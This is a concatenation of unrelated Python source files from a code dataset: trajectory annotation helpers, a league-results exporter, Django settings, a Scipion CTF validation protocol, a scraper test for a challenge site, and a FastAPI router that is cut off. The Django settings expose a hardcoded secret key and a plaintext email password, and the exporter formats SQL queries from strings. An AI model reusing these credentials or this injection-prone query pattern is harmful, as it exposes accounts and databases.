trajectory[-1].set_property('climb_rate', trajectory[-2].properties['climb_rate'])\n\n return trajectory\n\n# ----------------------------------------------------------------------\n\ndef get_climb_rate(trajectory, max_velocity=2000):\n \"\"\"Return a vector of scalars for point-to-point climb rate\n\n Args:\n trajectory (Trajectory): Trajectory to be annotated with climb rate\n\n Keyword Args:\n max_velocity (int): max possible velocity to use when calculating climb rate (Default: 2000)\n\n Returns:\n A vector of scalars with point-to-point climb rates\n\n \"\"\"\n\n scalars = numpy.zeros(len(trajectory))\n\n for i in range(len(trajectory)):\n climb_rate = float(trajectory[i].property('climb_rate')) / max_velocity\n if climb_rate < -1:\n climb_rate = -1\n if climb_rate > 1:\n climb_rate = 1\n\n value = 0.5 * ( climb_rate + 1 )\n scalars[i] = value\n return scalars\n\n# ----------------------------------------------------------------------\n\ndef get_airspeed(trajectory, min_speed=0, max_speed=980):\n \"\"\"Return a vector of scalars for point-to-point speeds\n\n This is a feature accessor that can be used to color a trajectory.\n It will map the 'speed' property into a range from 0 to 1.\n\n Args:\n trajectory (Trajectory): Trajectory containing speeds\n\n Keyword Args:\n min_speed (float): Minimum speed in kilometers per hour. This will be mapped to the bottom of the scalar range and thus the bottom of the color map. Defaults to 0. (Default: 0)\n max_speed (float): Maximum speed in kilometers per hour. This will be mapped to the top of the scalar range and thus the top of the color map. Defaults to 980 (0.8 Mach, a common maximum permitted speed for civilian airliners). (Default: 980)\n\n Returns:\n A vector of scalars that can be used as input to a colormap.\n\n \"\"\"\n\n return _get_scaled_speed(trajectory, min_speed=min_speed, max_speed=max_speed)\n\n# ----------------------------------------------------------------------\n\ndef get_speed_over_water(trajectory, min_speed=0, max_speed=60):\n \"\"\"Return a vector of scalars for point-to-point speeds over water\n\n This is a feature accessor that can be used to color a trajectory.\n It will map the 'speed' property into a range from 0 to 1.\n\n Args:\n trajectory (Trajectory): Trajectory containing speeds\n\n Keyword Args:\n min_speed (float): Minimum speed in kilometers per hour. This will be mapped to the bottom of the scalar range and thus the bottom of the color map. Defaults to 0. (Default: 0)\n max_speed (float): Maximum speed in kilometers per hour. This will be mapped to the top of the scalar range and thus the top of the color map. Defaults to 60 km/h (32 knots, very fast for big ships but slower than the maximum speed of high-speed civilian ferries). (Default: 60)\n\n Returns:\n A vector of scalars that can be used as input to a colormap.\n\n \"\"\"\n\n return _get_scaled_speed(trajectory, min_speed=min_speed, max_speed=max_speed)\n\ndef get_speed(trajectory):\n \"\"\"Get the speed for a trajectory without any scaling.\n\n Args:\n trajectory (Trajectory): Trajectory containing speeds\n\n Returns:\n Numpy array containing the speed value for each point\n\n \"\"\"\n scalars = numpy.zeros(len(trajectory))\n for i in range(len(trajectory)):\n scalars[i] = trajectory[i].speed\n\n return scalars\n\n# ----------------------------------------------------------------------\n\ndef _get_scaled_speed(trajectory, min_speed, max_speed):\n \"\"\"Internal method used for get_airspeed and get_speed_over_water\n\n This is a feature accessor that can be used to color a trajectory.\n It will map the 'speed' property into a range from 0 to 1.\n\n Args:\n trajectory (Trajectory): Trajectory containing speeds\n min_speed (float): Minimum speed in kilometers per hour. No default.\n max_speed (float): Maximum speed in kilometers per hour. No default.\n\n Returns:\n A vector of scalars that can be used as input to a colormap.\n \"\"\"\n\n scalars = numpy.zeros(len(trajectory))\n for i in range(len(trajectory)):\n speed = trajectory[i].speed\n value = (speed - min_speed) / (max_speed - min_speed)\n scalars[i] = value\n\n return scalars\n\n# ----------------------------------------------------------------------\n\ndef get_progress(trajectory):\n \"\"\"Return a vector of scalars for point-to-point flight progress\n\n Args:\n trajectory (Trajectory): Trajectory containing flight progress\n\n Returns:\n A vector of scalars with point-to-point flight progress\n\n \"\"\"\n\n scalars = numpy.zeros(len(trajectory))\n\n for i in range(len(trajectory)):\n scalars[i] = trajectory[i].property(\"progress\")\n\n return scalars\n\n# ----------------------------------------------------------------------\n\ndef progress(trajectory):\n \"\"\"Annotate points in an AirTrajectory with flight progress\n\n usage: progress(t: AirTrajectory) -> None\n\n This will add a property \"progress\" to each point in the input\n trajectory. This property will be 0 at the first point, 1 at the\n last point, and spaced evenly in between.\n\n Args:\n trajectory (Trajectory): Trajectory to be annotated with flight progress\n\n Returns:\n Trajectory annotated with flight progress\n\n \"\"\"\n\n if len(trajectory) == 0:\n return trajectory\n else:\n trajectory[0].set_property('progress', 0.0)\n if len(trajectory) > 1:\n step = 1.0 / (len(trajectory) - 1)\n current_value = step\n for i in range(1, len(trajectory)):\n trajectory[i].set_property('progress', 1.0 * current_value)\n current_value += step\n\n return trajectory\n\n# ----------------------------------------------------------------------\n\ndef compute_speed_from_positions(trajectory):\n \"\"\"Annotate points in an Trajectory with point-to-point speeds\n\n This will add a property \"speed\" to each point in the input\n trajectory. This property will be 0 at the first point, 1 at the\n last point, and spaced evenly in between.\n\n Args:\n trajectory (Trajectory): Trajectory to be annotated with speeds\n\n Returns:\n Trajectory annotated with point-to-point speeds\n \"\"\"\n\n for i in range(len(trajectory) - 1):\n speed_between_points = geomath.speed_between_points(trajectory[i], trajectory[i+1])\n trajectory[i].speed = speed_between_points\n\n if len(trajectory) > 1:\n trajectory[-1].speed = trajectory[-2].speed\n if len(trajectory) == 1:\n trajectory[-1].speed = 0\n\n return trajectory\n\n# ----------------------------------------------------------------------\n\ndef register_annotation(feature_name, compute_feature, retrieve_feature):\n global ALL_ANNOTATIONS\n ALL_ANNOTATIONS[feature_name] = [ compute_feature, retrieve_feature ]\n\n# ----------------------------------------------------------------------\n\ndef retrieve_feature_function(name):\n \"\"\"Supply feature function\n\n Args:\n name (str): Name of feature\n\n Returns:\n Function related to the feature\n\n \"\"\"\n\n global ALL_ANNOTATIONS\n return ALL_ANNOTATIONS[name][0]\n\ndef retrieve_feature_accessor(name):\n \"\"\"Supply feature accessor\n\n Args:\n name (str): Name of feature\n\n Returns:\n Accessor related to the feature\n\n \"\"\"\n\n global ALL_ANNOTATIONS\n return ALL_ANNOTATIONS[name][1]\n\ndef available_annotations():\n \"\"\"Supply all available annotations\n\n Returns:\n All of the possible annotation types\n\n \"\"\"\n\n global ALL_ANNOTATIONS\n return ALL_ANNOTATIONS.keys()\n\n\nregister_annotation('progress', progress, get_progress)\nregister_annotation('climb_rate', climb_rate, get_climb_rate)\nregister_annotation('airspeed', compute_speed_from_positions, get_airspeed)\nregister_annotation('speed_over_water', compute_speed_from_positions, get_speed_over_water)\nregister_annotation('speed', compute_speed_from_positions, get_speed)\n","repo_name":"sandialabs/tracktable","sub_path":"tracktable/Python/tracktable/feature/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":9758,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"22321010255","text":"#!/usr/bin/python\n\nimport MySQLdb\nimport json\nimport os\nimport boto3\nfrom jinja2 import Environment, FileSystemLoader\nimport ConfigParser\n\n\ndef write_results_file(league, cursor):\n cursor.execute(\"\"\"\n SELECT p.name, t.name, p.position, pw.price, pw.time\n FROM players_won pw\n JOIN players p\n ON p.playerid=pw.playerid\n JOIN teams t\n ON pw.teamid=t.id \n WHERE pw.leagueid = '{0}'\n \"\"\".format(league['id']))\n\n players = cursor.fetchall()\n\n data = {'data': players}\n\n data_dir = \"data/results\"\n data_file = os.path.join(data_dir, \"{0}.json\".format(league['name']))\n\n with open(data_file, 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef write_results_page(name, template):\n with open(\"html/results/{0}.html\".format(name), 'w') as outfile:\n outfile.write(template.render(league_name=name))\n\n\ndef write_contracts_file(league, cursor):\n cursor.execute(\"\"\"\n SELECT t.name, p.name, c.current_cost, c.years_left, c.broken\n FROM contracts c\n JOIN players p\n ON p.playerid=c.playerid\n JOIN teams t\n ON c.ownerid=t.ownerid\n AND c.leagueid=t.leagueid\n WHERE c.leagueid = '{0}'\n \"\"\".format(league['id']))\n\n players = cursor.fetchall()\n\n data = {'data': players}\n\n data_dir = \"data/contracts\"\n data_file = os.path.join(data_dir, \"{0}.json\".format(league['name']))\n\n with open(data_file, 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef write_contracts_page(name, template):\n with open(\"html/contracts/{0}.html\".format(name), 'w') as outfile:\n outfile.write(template.render(league_name=name))\n\n\n# Write a file to S3\ndef write_file(bucket, local_path, remote_path=''):\n\n if not remote_path:\n remote_path = local_path\n\n with open(local_path, 'r') as data:\n bucket.put_object(Key=remote_path, Body=data, ContentType='text/html')\n\n\nconfig = ConfigParser.ConfigParser()\nconfig.read('db.ini')\n\nsection = 'prod'\n\ndbconfig = {\n 'user': config.get(section, 'user'),\n 'passwd': config.get(section, 'password'),\n 'host': config.get(section, 'hostname'),\n 'port': config.getint(section, 'port'),\n 'db': config.get(section, 'schema'),\n 'charset': config.get(section, 'charset')\n}\n\ndb = MySQLdb.connect(**dbconfig)\n\ncursor = db.cursor()\n\ncursor.execute(\"SELECT id, name, sport FROM leagues\")\n\nleagues = {'baseball': [], 'football': []}\n\nfor row in cursor.fetchall():\n leagues[row[2]].append({'id': row[0], 'name': row[1]})\n\nenv = Environment(loader=FileSystemLoader('templates'))\nresults_template = env.get_template('results.html')\ncontracts_template = env.get_template('contracts.html')\n\nfor league in leagues['baseball']:\n write_results_file(league, cursor)\n write_results_page(league['name'], results_template)\n write_contracts_file(league, cursor)\n write_contracts_page(league['name'], contracts_template)\n\n\nfor league in leagues['football']:\n write_results_file(league, cursor)\n write_results_page(league['name'], results_template)\n write_contracts_file(league, cursor)\n write_contracts_page(league['name'], contracts_template)\n\ndb.close()\n\n\nindex_template = env.get_template('index.html')\n\nwith open('html/index.html', 'w') as outfile:\n outfile.write(index_template.render(leagues=leagues))\n\ns3 = boto3.resource('s3')\nbucket = s3.Bucket('twoguysandadream.com')\n\nwrite_file(bucket, os.path.join('html', 'index.html'), 'index.html')\n\nfor directory in ['data/results', 'html/results', 'data/contracts', 'html/contracts']:\n for file in os.listdir(directory):\n write_file(bucket, os.path.join(directory, file))\n","repo_name":"akeely/tgaad-draftresults","sub_path":"loadResults.py","file_name":"loadResults.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6539759510","text":"\"\"\"\nDjango settings for mysite project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\nimport djcelery\ndjcelery.setup_loader()\nBROKER_URL = 'django://'\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '(fv8g)z9^zqv$m%==93+_tjh&==m^isi-w502b1g5ws*t=_7)+'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.humanize',\n 'registration',\n 'novajoy'\n # 'dashaFilms'\n # 'djcelery',\n # 'kombu.transport.django',\n)\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n # 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\n# SEND_ACTIVATION_EMAIL=False\nACCOUNT_ACTIVATION_DAYS = 3\nREGISTRATION_AUTO_LOGIN = True\nAUTH_USER_MODEL = 'novajoy.Account'\nROOT_URLCONF = 'mysite.urls'\nLANGUAGE_CODE = 'ru-RU'\nUSE_I18N = True\nWSGI_APPLICATION = 'mysite.wsgi.application'\n\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_USER = 'cska631@gmail.com'\nEMAIL_HOST_PASSWORD = 'Dodiplomanow!'\nEMAIL_PORT = 587\nEMAIL_USE_TLS = True\n# Database\n\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'main',\n 'USER': 'root',\n 'PASSWORD': '',\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\n# STATIC_URL = '/static/'\nTEMPLATE_DIRS = [os.path.join(BASE_DIR, 'novajoy/templates')]\n\n\n_PATH = os.path.abspath(os.path.dirname(__file__))\n\nMEDIA_ROOT = os.path.join(_PATH, 'files', 'media')\nMEDIA_URL = '/media/'\n\nSTATIC_ROOT = os.path.join(_PATH, 'files', 'static')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n os.path.join(_PATH, 'static'),\n)\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n\n","repo_name":"VOVAN1993/mysite","sub_path":"mysite/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11841843500","text":"#!/usr/bin/env python\n\nfrom sequence import seq\n\nr_found = list()\n\nwhile True:\n i_seq = input(\"Searching for : \",)\n if i_seq == \"XXX\":\n print(\"Okay, I will stop.\")\n break\n elif i_seq.isdigit():\n print(\"You should type Amino acid.\")\n print(\"Please try again.\")\n break\n else:\n i = 0 # 인풋 1시작으로 하려면 1로\n for f_seq in seq:\n if f_seq == i_seq:\n r_found.append(str(i + 1))\n i += 1\n print(\"Found at : %s\" % (\",\".join(r_found)))\n\n","repo_name":"joy-son/BI-practice","sub_path":"bioinfomatics_3_8.py","file_name":"bioinfomatics_3_8.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1307160748","text":"# **************************************************************************\n# *\n# * Authors: Yunior C. Fonseca Reyna (cfonseca@cnb.csic.es)\n# *\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia , CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion@cnb.csic.es'\n# *\n# **************************************************************************\nimport logging\nimport pyworkflow.protocol.params as params\nfrom pwem.protocols import EMProtocol\nfrom pyworkflow import BETA\nimport pyworkflow.object as pwobj\n\nfrom tomo.objects import SetOfCTFTomoSeries\n\nlogger = logging.getLogger(__name__)\n\nOUTPUT_BAD_CTF_SERIE = \"badCTFTomoSeries\"\nOUTPUT_GOOD_CTF_SERIE = \"goodCTFTomoSeries\"\n\n\nclass ProtCTFTomoSeriesValidate(EMProtocol):\n \"\"\"\n Validate a set of CTF tomo series and separate into two sets (good and\n bad tomo series )\n \"\"\"\n _label = 'ctf validate'\n _devStatus = BETA\n\n # -------------------------- DEFINE param functions -----------------------\n\n def _defineParams(self, form):\n \"\"\" Define input parameters from this program into the given form. \"\"\"\n form.addSection(label='Input')\n form.addParam('inputCtfTomoSeries', params.PointerParam, important=True,\n pointerClass='SetOfCTFTomoSeries',\n label='Input ctf tomo series')\n\n form.addSection(label='CTF validation')\n form.addParam('validationType', params.EnumParam,\n display=params.EnumParam.DISPLAY_HLIST,\n choices=[\"Global\", \"Per tilt\"],\n label=\"Validation type\",\n default=0,\n help=\"Global mode: the series with at least \"\n \"one image that does not satisfy the criteria are \"\n \"rejected \\n\"\n \"Per tilt mode: the series containing a certain \"\n \"number of images that does not satisfy the \"\n \"criteria are rejected\")\n form.addParam('numberImages', params.IntParam,\n label='Number of images to rejected',\n condition='validationType==1', default=None,\n allowsNull=True,\n help=\"Number of images taking into account to rejected a \"\n \"ctf series\")\n self.addCriteriaParams(form)\n\n def addCriteriaParams(self, form):\n form.addParam('defocusCriteria', params.EnumParam,\n display=params.EnumParam.DISPLAY_HLIST,\n choices=[\"Yes\", \"No\"],\n label=\"Defocus tolerance\",\n default=1, help=\"Validate the defocus deviation taking \"\n \"into account a threshold(tolerance) \"\n \"respect to a defocus expected value.\")\n form.addParam('defocusValue', params.FloatParam,\n label='Expected value (Å)',\n condition='defocusCriteria==0', default=None,\n allowsNull=True,\n help=\"Defocus expected value in Å\")\n form.addParam('defocusTolerance', params.FloatParam,\n label='Tolerance value (Å)',\n condition='defocusCriteria==0', default=None,\n allowsNull=True,\n help=\"Defocus tolerance value in Å\")\n\n form.addParam('astigmatismCriteria', params.EnumParam,\n display=params.EnumParam.DISPLAY_HLIST,\n choices=[\"Yes\", \"No\"],\n label=\"Astigmatism\",\n default=1, help=\"Validate the astigmatism taking into \"\n \"account a tolerance value.\")\n form.addParam('astigmatismTolerance', params.FloatParam,\n label='Tolerance value',\n condition='astigmatismCriteria==0', default=1.1,\n help=\"Astigmatism tolerance value\")\n\n form.addParam('resolutionCriteria', params.EnumParam,\n display=params.EnumParam.DISPLAY_HLIST,\n choices=[\"Yes\", \"No\"],\n label=\"Resolution\",\n default=1, help=\"Validate the resolution taking into \"\n \"account a expected resolution.\")\n form.addParam('resolutionTolerance', params.FloatParam,\n label='Expected value',\n allowsNull=True,\n condition='resolutionCriteria==0', default=None,\n help=\"Expected resolution value\")\n\n def _insertAllSteps(self):\n self._insertFunctionStep(self.ctfValidateStep)\n self._insertFunctionStep(self.createOutputStep)\n\n # ----------------------------STEPS --------------------------------------\n def ctfValidateStep(self):\n \"\"\"\n Validate all ctf tomo series and separate into two sets(good and bad\n following the selected criteria)\n \"\"\"\n\n self.goodCTFTomoSeries = None\n self.badCTFTomoSeries = None\n self.validateDict = {}\n imagesToReject = 1 # Case of global validation type\n ctfSeries = self.inputCtfTomoSeries.get()\n\n if self.validationType.get() == 1:\n imagesToReject = self.numberImages.get()\n\n self.printTable(imagesToReject)\n printStr = \"\"\n for ctfSerie in ctfSeries:\n newCTFTomoSeries = ctfSerie.clone()\n ctfEstItems = []\n faileDefocusCriteria = 0\n failedAstigmatismCriteria = 0\n failedResolutionCriteria = 0\n for item in ctfSerie.iterItems():\n ctfEstItem = item.clone()\n ctfEstItems.append(ctfEstItem)\n\n # Defocus angles criteria\n if self.defocusCriteria.get() == 0:\n faileDefocusCriteria = self._validateCtfDefocusDeviation(ctfEstItems,\n self.defocusValue.get(),\n self.defocusTolerance.get())\n\n # Astigmatism criteria\n if self.astigmatismCriteria.get() == 0:\n failedAstigmatismCriteria = self._validateAstigmatism(ctfEstItems,\n self.astigmatismTolerance.get())\n\n # Resolution criteria\n if self.resolutionCriteria.get() == 0:\n # Some estimation methods don't calculate the resolution\n if ctfEstItems[0].getResolution() is not None:\n failedResolutionCriteria = self._validateResolution(ctfEstItems,\n self.resolutionTolerance.get())\n\n validate = self.validateCtf(ctfEstItems,\n imagesToReject=imagesToReject)\n\n result = \"Pass\" if validate else \"Rejected\"\n printStr += \"{0:25} {1:30} {2:30} {3:30} {4:^50}\".format(ctfSerie.getTsId(),\n faileDefocusCriteria,\n failedAstigmatismCriteria,\n failedResolutionCriteria,\n result)\n printStr += \"\\n\"\n\n if validate:\n newCTFTomoSeries.setEnabled(True)\n output = self.getOutputSetOfCTFTomoSeries(OUTPUT_GOOD_CTF_SERIE)\n output.append(newCTFTomoSeries)\n else:\n newCTFTomoSeries.setEnabled(False)\n output = self.getOutputSetOfCTFTomoSeries(OUTPUT_BAD_CTF_SERIE)\n output.append(newCTFTomoSeries)\n\n for ctfItem in ctfEstItems:\n newCTFTomoSeries.append(ctfItem)\n\n logger.info(printStr)\n\n def createOutputStep(self):\n if self.goodCTFTomoSeries is not None:\n self.goodCTFTomoSeries.setStreamState(pwobj.Set.STREAM_CLOSED)\n self.goodCTFTomoSeries.write()\n self._store()\n if self.badCTFTomoSeries is not None:\n self.badCTFTomoSeries.setStreamState(pwobj.Set.STREAM_CLOSED)\n self.badCTFTomoSeries.write()\n self._store()\n\n # --------------------------UTILS methods ----------------------------------\n def _validateCtfDefocusDeviation(self, ctfEstItems, defocusValue, tolerance):\n \"\"\"\n Validate the set of ctf tomo series taking into account de defocus angle\n deviation\n \"\"\"\n failedCTF = self.validateDefocusUDeviation(ctfEstItems, defocusValue,\n defocusUTolerance=tolerance)\n failedCTF += self.validateDefocusVDeviation(ctfEstItems, defocusValue,\n defocusVTolerance=tolerance)\n return failedCTF\n\n def _validateAstigmatism(self, ctfEstItems, astigmatismTolerance):\n \"\"\"\n Validate the set of ctf tomo series taking into account de astigmatism\n threshold:\n the _objEnable property is set as True if the astigmatism is in range or False\n in other case, in each ctfTomoItems\n \"\"\"\n failedCTF = 0\n for ctfTomo in ctfEstItems:\n isAstigmatismInRange = True if ctfTomo.getDefocusAngle() < astigmatismTolerance else False\n if not isAstigmatismInRange:\n failedCTF += 1\n ctfTomo.setEnabled(isAstigmatismInRange)\n return failedCTF\n\n def _validateResolution(self, ctfEstItems, resolutionTolerance):\n failedCTF = 0\n for ctfTomo in ctfEstItems:\n isAstigmatismInRange = True if ctfTomo.getResolution() < resolutionTolerance else False\n if not isAstigmatismInRange:\n failedCTF += 1\n ctfTomo.setEnabled(isAstigmatismInRange)\n return failedCTF\n\n @staticmethod\n def validateCtf(ctfItemsList, imagesToReject=1):\n \"\"\"\n Validate the ctftomo serie.\n Return the number of images marked as disable\n \"\"\"\n count = 0\n for ctfItem in ctfItemsList:\n if not ctfItem.isEnabled():\n count += 1\n if count == imagesToReject:\n return False\n return True\n\n def validateDefocusVDeviation(self, ctfTomoItems, defocusVValue, defocusVTolerance=20):\n \"\"\"\n Set _objEnable property as True if the deviation is in range or False\n in other case, in each ctfTomoItems\n \"\"\"\n failedCTF = 0\n for ctfTomo in ctfTomoItems:\n defocusVdeviation = abs(ctfTomo.getDefocusV() - defocusVValue)\n isDefocusVDeviationInRange = True if defocusVdeviation < defocusVTolerance else False\n if not isDefocusVDeviationInRange and ctfTomo.isEnabled():\n failedCTF += 1\n ctfTomo.setEnabled(isDefocusVDeviationInRange)\n return failedCTF\n\n def validateDefocusUDeviation(self, ctfTomoItems, defocusUValue, defocusUTolerance=20):\n \"\"\"\n Set _objEnable property as True if the deviation is in range or False\n in other case, in each ctfTomoItems\n \"\"\"\n failedCTF = 0\n for ctfTomo in ctfTomoItems:\n defocusUdeviation = abs(ctfTomo.getDefocusU() - defocusUValue)\n isDefocusUDeviationInRange = True if defocusUdeviation < defocusUTolerance else False\n if not isDefocusUDeviationInRange and ctfTomo.isEnabled():\n failedCTF += 1\n ctfTomo.setEnabled(isDefocusUDeviationInRange)\n return failedCTF\n\n def _getSetOfTiltSeries(self, pointer=False):\n return self.inputCtfTomoSeries.get().getSetOfTiltSeries(pointer=pointer)\n\n def getOutputSetOfCTFTomoSeries(self, outputSetName):\n outputSetOfCTFTomoSeries = getattr(self, outputSetName, None)\n\n if outputSetOfCTFTomoSeries:\n outputSetOfCTFTomoSeries.enableAppend()\n else:\n outputSetOfCTFTomoSeries = SetOfCTFTomoSeries.create(self._getPath(),\n prefix=outputSetName)\n outputSetOfCTFTomoSeries.setSetOfTiltSeries(self._getSetOfTiltSeries())\n outputSetOfCTFTomoSeries.setStreamState(pwobj.Set.STREAM_OPEN)\n self._defineOutputs(**{outputSetName: outputSetOfCTFTomoSeries})\n\n return outputSetOfCTFTomoSeries\n\n def allowsDelete(self, obj):\n return True\n\n def _validate(self):\n return []\n\n def _summary(self):\n summary = []\n if hasattr(self, 'goodCTFTomoSeries'):\n summary.append(\"Number of good ctf series: %d.\" % (self.goodCTFTomoSeries.getSize()))\n if hasattr(self, 'badCTFTomoSeries'):\n summary.append(\"Number of bad ctf series: %d.\" % (self.badCTFTomoSeries.getSize()))\n\n return summary\n\n def printTable(self, imagesToReject):\n printStr = \"\\n-------------------------------------------------------\\n\"\n printStr += \"Number of failed images to reject: %s\\n\" % imagesToReject\n printStr += '--------------------------------------------------------\\n'\n printStr += \"{0:35} {1:25} {2:25} {3:25} {4:20}\".format('CTFTomoSerie',\n 'Defocus tolerance',\n 'Astigmatism',\n 'Resolution',\n 'Validate').ljust(5, ' ')\n printStr += \"\\n\"\n printStr += '------------------------' * 7\n\n logger.info(printStr)\n","repo_name":"scipion-em/scipion-em-tomo","sub_path":"tomo/protocols/protocol_ctf_validate.py","file_name":"protocol_ctf_validate.py","file_ext":"py","file_size_in_byte":14719,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"18796523770","text":"import time\nimport base64\nimport requests\n\n\n# window._signature = btoa(Date.now()) Date.now() = 1667954735995\nurl = 'http://spider.wangluozhe.com/challenge/api/9'\nheaders = {\n # 'Host': 'spider.wangluozhe.com',\n # 'Connection': 'keep-alive',\n # 'Content-Length': '51',\n # 'Accept': 'application/json, text/javascript, */*; q=0.01',\n # 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36',\n # 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n # 'Origin': 'http://spider.wangluozhe.com',\n # 'Accept-Encoding': 'gzip, deflate',\n # 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Cookie': 'v=A4g1_bTDf-ua1ZNF7Nga0u-AWf2fMezEzpTAvEI71rj2SCYj6kG8yx6lkEyR; session=85fa876c-984a-4e55-8426-d32588907af4.uY_ISWk0OFIYlPQBuplTQv2lyNY',\n }\n\n\nt = int(time.time()*1000)\nprint(t)\nsign = base64.b64encode(str(t).encode()).decode()\nprint(sign)\ndata = {\n 'page': 3,\n 'count': 10,\n '_signature': sign\n}\nproxies = {\n 'http': 'http://127.0.0.1:8899',\n 'https': 'http://127.0.0.1:8899'\n}\nresp = requests.post(url, headers=headers)\nprint(resp.status_code)\n\n","repo_name":"konatax/crawler","sub_path":"网络者/【简单】09_未完成/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"33895563776","text":"from typing import Annotated\n\nfrom beanie import PydanticObjectId\nfrom beanie.operators import In\nfrom fastapi import APIRouter, HTTPException, Path, Query, status\n\nfrom tekst.auth import OptionalUserDep\nfrom tekst.models.layer import LayerBaseDocument, LayerNodeCoverage\nfrom tekst.models.text import (\n NodeDocument,\n NodeRead,\n)\nfrom tekst.models.unit import UnitBaseDocument\n\n\n# initialize unit router\nrouter = APIRouter(\n prefix=\"/browse\",\n tags=[\"browse\"],\n responses={status.HTTP_404_NOT_FOUND: {\"description\": \"Not found\"}},\n)\n\n\n@router.get(\"/unit-siblings\", response_model=list[dict], status_code=status.HTTP_200_OK)\nasync def get_unit_siblings(\n user: OptionalUserDep,\n layer_id: Annotated[\n PydanticObjectId,\n Query(description=\"ID of layer the requested units belong to\", alias=\"layerId\"),\n ],\n parent_node_id: Annotated[\n PydanticObjectId | None,\n Query(\n description=\"ID of node for which siblings to get associated units for\",\n alias=\"parentNodeId\",\n ),\n ] = None,\n) -> list[dict]:\n \"\"\"\n Returns a list of all data layer units belonging to the data layer\n with the given ID, associated to nodes that are children of the parent node\n with the given ID.\n\n As the resulting list may contain units of arbitrary type, the\n returned unit objects cannot be typed to their precise layer unit type.\n Also, the returned unit objects have an additional property containing their\n respective node's label, level and position.\n \"\"\"\n\n layer = await LayerBaseDocument.find_one(\n LayerBaseDocument.id == layer_id,\n LayerBaseDocument.allowed_to_read(user),\n with_children=True,\n )\n\n if not layer:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Layer with ID {layer_id} could not be found.\",\n )\n\n nodes = await NodeDocument.find(\n NodeDocument.text_id == layer.text_id,\n NodeDocument.level == layer.level,\n NodeDocument.parent_id == parent_node_id,\n ).to_list()\n\n unit_docs = await UnitBaseDocument.find(\n UnitBaseDocument.layer_id == layer_id,\n In(UnitBaseDocument.node_id, [node.id for node in nodes]),\n with_children=True,\n ).to_list()\n\n return [unit_doc.model_dump(camelize_keys=True) for unit_doc in unit_docs]\n\n\n@router.get(\n \"/nodes/path\", response_model=list[NodeRead], status_code=status.HTTP_200_OK\n)\nasync def get_node_path(\n text_id: Annotated[PydanticObjectId, Query(alias=\"textId\")],\n level: int,\n position: int,\n) -> list[NodeDocument]:\n \"\"\"\n Returns the text node path from the node with the given level/position\n as the last element, up to its most distant ancestor node\n on structure level 0 as the first element of an array.\n \"\"\"\n node_doc = await NodeDocument.find_one(\n NodeDocument.text_id == text_id,\n 